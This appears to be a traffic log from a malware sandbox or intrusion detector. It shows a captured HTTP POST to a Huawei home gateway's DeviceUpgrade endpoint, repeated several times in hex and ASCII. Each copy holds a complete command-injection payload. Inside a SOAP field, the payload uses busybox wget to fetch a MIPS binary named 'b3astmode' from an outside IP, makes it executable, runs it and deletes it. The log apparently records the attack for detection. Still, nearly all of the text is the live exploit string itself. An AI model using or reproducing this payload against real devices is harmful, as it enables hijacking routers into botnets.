              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
